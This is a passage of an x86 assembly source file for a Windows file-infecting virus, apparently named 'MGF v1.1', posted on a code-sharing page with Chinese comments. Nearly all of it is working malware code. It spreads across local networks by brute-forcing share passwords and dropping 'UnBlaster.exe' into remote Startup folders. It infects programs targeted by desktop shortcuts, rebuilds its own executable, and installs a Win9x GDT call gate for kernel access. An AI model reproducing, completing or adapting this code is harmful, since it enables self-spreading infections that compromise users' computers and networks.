📄 bingdu.txt
字号:
add edx,[edx+3ch]
mov edx,[edx+78h]
add edx,_hModule
mov ecx,[edx+18h]
mov esi,[edx+20h]
mov edi,_lpszProcName
push edi
push ecx
xor eax,eax
mov ecx,0ffffffffh
repnz scasb
not ecx
dec ecx
mov @dwSize,ecx ;计算函数名的长度
pop ecx
pop edi
add esi,_hModule
@@:
push edi
push ecx
mov ecx,@dwSize
lodsd
add eax,_hModule
xchg eax,esi
repz cmpsb
xchg eax,esi
pop ecx
pop edi
loopnz @b
.if !ZERO?
xor eax,eax
ret
.endif
sub esi,_hModule
sub esi,4
sub esi,[edx+20h]
shr esi,1
add esi,[edx+24h]
add esi,_hModule
lodsd
movzx eax,ax
shl eax,2
add eax,[edx+1ch]
add eax,_hModule
mov edx,[eax]
add edx,_hModule
xchg edx,eax
ret
_GetProcAddress endp
;感染局域网的线程
_GoLAN proc lParam
local @hEnum
local @dwcCount
local @szResourceName[32]:byte
local @szBuffer[0c00h]:byte
pushad
db 0e8h,0,0,0,0
pop ebx
sub ebx,$-1
lea eax,@hEnum
push eax
push 0
push 13h
push 0
push 5
call dwWNetOpenEnum[ebx]
.if !eax
.repeat
mov @dwcCount,-1
lea eax,dwBufferSize[ebx]
push eax
lea eax,@szBuffer
push eax
lea eax,@dwcCount
push eax
push @hEnum
call dwWNetEnumResource[ebx]
cmp dword ptr [@szBuffer+14h],0
jnz @f
.until eax
push @hEnum
call dwWNetCloseEnum[ebx]
.endif
jmp _GoLANexit
@@:
push @hEnum
call dwWNetCloseEnum[ebx]
lea edi,@szBuffer
_NextPC:
push edi
mov esi,[edi+14h]
lea edi,@szResourceName
@@:
lodsb
stosb
or al,al
jnz @b
mov dword ptr [edi-1],'C'
pop edi
xor eax,eax
mov dwPassword[ebx],eax
@@:
lea edx,szLocalDrive[ebx]
push edx
push eax
lea edx,@szResourceName
push edx
call dwWNetAddConnection[ebx]
.if eax==56h
call _GenPassWord
cmp dwPassword[ebx],0
jnz @b
.elseif !eax
push 0
lea eax,szDFile[ebx]
push eax
lea eax,szSFile[ebx]
push eax
call dwCopyFile[ebx] ;如果找到可写共享,感染
mov esi,eax
push 1
lea eax,szLocalDrive[ebx]
push eax
call dwWNetCancelConnection[ebx]
call _GenPassWord
or esi,esi
jz @b
.endif
add edi,20h
dec @dwcCount
jnz _NextPC
_GoLANexit:
popad
ret
_GoLAN endp
szMemToFileName db 'UnBlaster.exe',0
szSFile db 'c:\windows\system\UnBlaster.exe',0
szDFile db 'X:\WINDOWS\All Users\Start Menu\Programs\启动\UnBlaster.exe',0
dwPassword dd 0
dd 0,0
szPassword db 0
szLocalDrive db 'x:',0
dwBufferSize dd 0c00h
_GenPassWord: ;生成密码的子程序,密码包括1234567890!@#$%^字符
std
pushad
lea edi,[ebx+szPassword-1]
xor edx,edx
mov eax,dwPassword[ebx]
mov ecx,16
@@:
div ecx
xchg eax,edx
.if al<=5
add al,21h
.else ;if al>=6 && al<=15
add al,2ah
.endif
stosb
xor eax,eax
xchg eax,edx
or eax,eax
jnz @b
inc edi
inc dwPassword[ebx]
mov [esp+20h-4],edi
popad
cld
ret
_MemToFile proc ;还原病毒自身的子程序
local @hFile
local @hFileMap
local @lpFileMap
local @lpSystemDir[40h]:byte
push 40h
lea edi,@lpSystemDir
push edi
call dwGetSystemDirectory[ebx]
;invoke GetSystemDirectory,addr @lpSystemDir,100h
add edi,eax
mov al,''
stosb
lea esi,szMemToFileName[ebx]
mov ecx,16
rep movsb
push 0
push 80h
push 2
push 0
push 0
push 0c0000000h
lea eax,@lpSystemDir
push eax
call dwCreateFileA[ebx]
;invoke CreateFile,addr @lpSystemDir,0c0000000h,0,0,2,80h,0
.if eax!=0ffffffffh
mov @hFile,eax
mov edx,VirusSize
add edx,200h
push 0
push edx
push 0
push 4
push 0
push eax
call dwCreateFileMapping[ebx]
;invoke CreateFileMapping,eax,0,4,0,edx,0
.if eax
mov @hFileMap,eax
push 0
push 0
push 0
push 6
push eax
call dwMapViewOfFile[ebx]
;invoke MapViewOfFile,eax,6,0,0,0
.if eax
mov @lpFileMap,eax
mov edi,eax
mov esi,hKernel32[ebx]
mov ecx,0a8h
rep movsb ;用KERNEL32的DOS头
mov dword ptr [eax+3ch],0a8h
mov dword ptr [eax+20h],'FGM'
lea esi,FileHead[ebx]
mov ecx,120h
rep movsb ;原PE头
xor eax,eax
mov ecx,38h
rep stosb
lea esi,VirusStart[ebx]
mov ecx,VirusSize
push edi
rep movsb ;病毒代码
pop edi
mov esi,offset VirusExit-offset VirusStart
mov dword ptr [edi+esi],offset VirusExit+4
push @lpFileMap
call dwUnmapViewOfFile[ebx]
;invoke UnmapViewOfFile,@lpFileMap
.endif
push @hFileMap
call dwCloseHandle[ebx]
;invoke CloseHandle,@hFileMap
.endif
push @hFile
call dwCloseHandle[ebx]
;invoke CloseHandle,@hFile
.endif
ret
_MemToFile endp
_ProcessImportTab: ;手工处理导入函数
lea esi,FunctionNameTab[ebx]
lea edi,FunctionAddressTab[ebx]
@@:
lodsd
.if eax==0ffffffffh
lodsd
add eax,ebx
push eax
call dwLoadLibrary[ebx]
mov ecx,eax
.elseif eax
add eax,ebx
push ecx
push eax
push ecx
call dwGetProcAddress[ebx]
stosd
pop ecx
.endif
or eax,eax
jnz @b
ret
_IsWindows9x: ;往WIN98的GDT添加CALLGATE的子程序
.if !ZERO? ;win9x
xor ecx,ecx
push ecx
push cx
sgdt fword ptr [esp]
pop cx
pop edi
sub ecx,8
and cl,0f8h
or cl,3
mov CallGateSel[ebx],ecx
xor edx,edx
lar edx,ecx
.if dh!=0ech
and cl,0f8h
mov edx,dwC3Address[ebx]
mov word ptr [edi+ecx],dx
shr edx,16
mov word ptr [edi+ecx+6],dx
mov dword ptr [edi+ecx+2],0ec000028h
.endif
.endif
ret
_GetModuleAddress:
@@:
and ax,0f000h
sub eax,1000h
cmp word ptr [eax],'ZM'
jnz @b
mov ecx,eax
add ecx,[ecx+3ch]
cmp dword ptr [ecx],'EP'
jnz @b
ret
_GetC3Address:
mov edi,hKernel32[ebx]
add edi,1000h
mov ecx,20000h
mov al,0c3h
cld
repnz scasb
dec edi
mov dwC3Address[ebx],edi
ret
FunctionAddressTab:
dwLoadLibrary dd 0
dwGetProcAddress dd 0
dwGetVersion dd 0
dwCloseHandle dd 0
dwCreateProcess dd 0
dwCreateFile dd 0
dwGetFileAttributes dd 0
dwSetFileAttributes dd 0
dwCreateFileA dd 0
dwGetFileAttributesA dd 0
dwSetFileAttributesA dd 0
dwGetSystemDirectory dd 0
dwCreateFileMapping dd 0
dwCreateThread dd 0
dwGetFileSize dd 0
dwGetFileTime dd 0
dwSetFileTime dd 0
dwGetFileType dd 0
dwGetLocalTime dd 0
dwCopyFile dd 0
dwMapViewOfFile dd 0
dwUnmapViewOfFile dd 0
dwFindFirstFile dd 0
dwFindNextFile dd 0
dwFindClose dd 0
dwMessageBox dd 0
dwRegCloseKey dd 0
dwRegCreateKeyEx dd 0
dwRegOpenKeyEx dd 0
dwRegQueryvalueEx dd 0
dwRegSetvalueEx dd 0
dwWNetAddConnection dd 0
dwWNetCancelConnection dd 0
dwWNetCloseEnum dd 0
dwWNetEnumResource dd 0
dwWNetOpenEnum dd 0
_OtherMemPosition: ;驻留在别处的后半部2K
FunctionNameTab:
dd 0ffffffffh
dd offset szKernel32
dd offset szLoadLibraryA
dd offset szGetProcAddress
dd offset szGetVersion
dd offset szCloseHandle
dd offset szCreateProcess
dd offset szCreateFile
dd offset szGetFileAttributes
dd offset szSetFileAttributes
dd offset szCreateFileA
dd offset szGetFileAttributesA
dd offset szSetFileAttributesA
dd offset szGetSystemDirectoryA
dd offset szCreateFileMappingA
dd offset szCreateThread
dd offset szGetFileSize
dd offset szGetFileTime
dd offset szSetFileTime
dd offset szGetFileType
dd offset szGetLocalTime
dd offset szCopyFileA
dd offset szMapViewOfFile
dd offset szUnmapViewOfFile
dd offset szFindFirstFileA
dd offset szFindNextFileA
dd offset szFindClose
dd 0ffffffffh
dd offset szUser32
dd offset szMessageBoxA
dd 0ffffffffh
dd offset szADVAPI32
dd offset szRegCloseKey
dd offset szRegCreateKeyExA
dd offset szRegOpenKeyExA
dd offset szRegQueryvalueExA
dd offset szRegSetvalueExA
dd 0ffffffffh
dd offset szMPR
dd offset szWNetAddConnectionA
dd offset szWNetCancelConnectionA
dd offset szWNetCloseEnum
dd offset szWNetEnumResourceA
dd offset szWNetOpenEnumA
dd 0
szKernel32 db 'kernel32.dll',0
szLoadLibraryA db 'LoadLibraryA',0
szGetProcAddress db 'GetProcAddress',0
szGetVersion db 'GetVersion',0
szCloseHandle db 'CloseHandle',0
szCreateProcess db 'CreateProcessW',0
szCreateFile db 'CreateFileW',0
szGetFileAttributes db 'GetFileAttributesW',0
szSetFileAttributes db 'SetFileAttributesW',0
szCreateFileA db 'CreateFileA',0
szGetFileAttributesA db 'GetFileAttributesA',0
szSetFileAttributesA db 'SetFileAttributesA',0
szGetSystemDirectoryA db 'GetSystemDirectoryA',0
szCreateFileMappingA db 'CreateFileMappingA',0
szCreateThread db 'CreateThread',0
szGetFileSize db 'GetFileSize',0
szGetFileTime db 'GetFileTime',0
szSetFileTime db 'SetFileTime',0
szGetFileType db 'GetFileType',0
szGetLocalTime db 'GetLocalTime',0
szCopyFileA db 'CopyFileA',0
szMapViewOfFile db 'MapViewOfFile',0
szUnmapViewOfFile db 'UnmapViewOfFile',0
szFindFirstFileA db 'FindFirstFileA',0
szFindNextFileA db 'FindNextFileA',0
szFindClose db 'FindClose',0
;szUSER32 db 'USER32.dll',0
szMessageBoxA db 'MessageBoxA',0
szADVAPI32 db 'ADVAPI32.dll',0
szRegCloseKey db 'RegCloseKey',0
szRegCreateKeyExA db 'RegCreateKeyExA',0
szRegOpenKeyExA db 'RegOpenKeyExA',0
szRegQueryvalueExA db 'RegQueryvalueExA',0
szRegSetvalueExA db 'RegSetvalueExA',0
szMPR db 'MPR.dll',0
szWNetAddConnectionA db 'WNetAddConnectionA',0
szWNetCancelConnectionA db 'WNetCancelConnectionA',0
szWNetCloseEnum db 'WNetCloseEnum',0
szWNetEnumResourceA db 'WNetEnumResourceA',0
szWNetOpenEnumA db 'WNetOpenEnumA',0
_EditLnkFile proc ;感染桌面快捷方式的子程序
local @hFile
local @hFileMap
local @lpFileMap
local @hFindFile
local @dwFileSize
local @dwBufferSize
local @lpBuffer[80h]:byte
local @stWin32FindData:WIN32_FIND_DATA
pushad
lea eax,@hFile
push eax
push 1
push 0
lea eax,szRegKeyDesktop[ebx]
push eax
push 80000001h
call dwRegOpenKeyEx[ebx]
.if !eax
mov @dwBufferSize,80h
lea eax,@dwBufferSize
push eax
lea eax,@lpBuffer
push eax
push 0
push 0
lea eax,szDesktopvalue[ebx]
push eax
push @hFile
call dwRegQueryvalueEx[ebx]
push @hFile
call dwRegCloseKey[ebx]
dec @dwBufferSize
lea edi,@lpBuffer
add edi,@dwBufferSize
.if byte ptr [edi-1]!=''
mov al,''
stosb
inc @dwBufferSize
.endif
mov eax,'nl.*'
stosd
mov eax,'k'
stosd
lea eax,@stWin32FindData
push eax
lea eax,@lpBuffer
push eax
call dwFindFirstFile[ebx] ;查找第一个lnk文件
;invoke FindFirstFile,addr @lpBuffer,addr @stWin32FindData
.if eax!=INVALID_HANDLE_VALUE
mov @hFindFile,eax
.repeat
mov eax,dword ptr [@stWin32FindData+20h]
mov @dwFileSize,eax
mov ecx,@dwBufferSize
lea edi,@stWin32FindData+2ch
sub edi,ecx
lea esi,@lpBuffer
push edi
rep movsb
pop edi
push 0
push 80h
push 3
push 0
push 1
push 80000000h
push edi
call dwCreateFileA[ebx]
;invoke CreateFile,edi,80000000h,1,0,3,80h,0
.if eax!=0ffffffffh
mov @hFile,eax
push 0
push 0
push 0
push 2
push 0
push eax
call dwCreateFileMapping[ebx]
;invoke CreateFileMapping,eax,0,2,0,0,0
.if eax
mov @hFileMap,eax
push 0
push 0
push 0
push 4
push eax
call dwMapViewOfFile[ebx]
;invoke MapViewOfFile,eax,4,0,0,0
.if eax
mov @lpFileMap,eax
lea esi,[eax+65h]
mov edi,esi
mov ecx,@dwFileSize
sub ecx,66h
@@:
inc edi
push esi
push edi
push ecx
mov ecx,3
repz cmpsb ;复制*.lnk文件里的EXE文件的路径
pop ecx
pop edi
pop esi
loopnz @b
.if ZERO? && byte ptr [edi+3]
mov esi,edi
sub edi,@lpFileMap
mov ecx,@dwFileSize
sub ecx,edi
lea edi,@stWin32FindData
push edi
@@:
lodsb
stosb
or al,al
loopnz @b
pop edi
mov eax,[edi+2]
and eax,0dfdfdfdfh
.if eax=='NIW'
xor edi,edi
.else
.if !dwVersion[ebx] && eax=='ORP'
xor edi,edi
.endif
.endif
.else
xor edi,edi
.endif
push @lpFileMap
call dwUnmapViewOfFile[ebx]
;invoke UnmapViewOfFile,@lpFileMap
.endif
push @hFileMap
call dwCloseHandle[ebx]
;invoke CloseHandle,@hFileMap
.endif
push @hFile
call dwCloseHandle[ebx]
;invoke CloseHandle,@hFile
.endif
.if edi
push 7
push edi
call _EditFile ;符合条件,感染
.endif
lea eax,@stWin32FindData
push eax
push @hFindFile
call dwFindNextFile[ebx] ;继续搜索lnk文件
;invoke FindNextFile,@hFindFile,addr @stWin32FindData
.until eax==0
push @hFindFile
call dwFindClose[ebx]
;invoke FindClose,@hFindFile
.endif
.endif
popad
ret
_EditLnkFile endp
szRegKeyDesktop db 'Software\Microsoft\Windows\CurrentVersion\Explorer\Shell
Folders',0
szDesktopvalue db 'Desktop',0
szMessageTit db '莫国防的技术使者之宣言',0
szMessageText db '本使者为传播技术而来,已在这里安营扎寨。我无破坏力,你不必
担心!',13,10
db '致我的偶像比尔.盖茨:你的几个傻瓜手下,轻视我的漏洞报告,你该打他们的
PP!',0
szVer db 'Name: MGF v1.1',0
address db '(C) NN.CN (P) 2003-10-08',0
email db 'wohoo2002@hotmail.com',0
FileHead db 120h dup(255) ;病毒PE头,恢复病毒时用,需要手工填入,这里仅预留空
间
ImportDirItem: ;导入表,没有它2000/XP/2003拒绝装入执行,必须
dd offset FirstThunk0-400000h
dd 0
dd 0
dd offset szKernel32-400000h
dd offset FirstThunk1-400000h
dd 5 dup(0)
FirstThunk0:
dd offset szFunctionName-400000h
dd 0
FirstThunk1:
dd offset szFunctionName-400000h
dd 0
szFunctionName:
dw 75h
db 'ExitProcess',0,0,0
VirusEnd:
end VirusStart
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -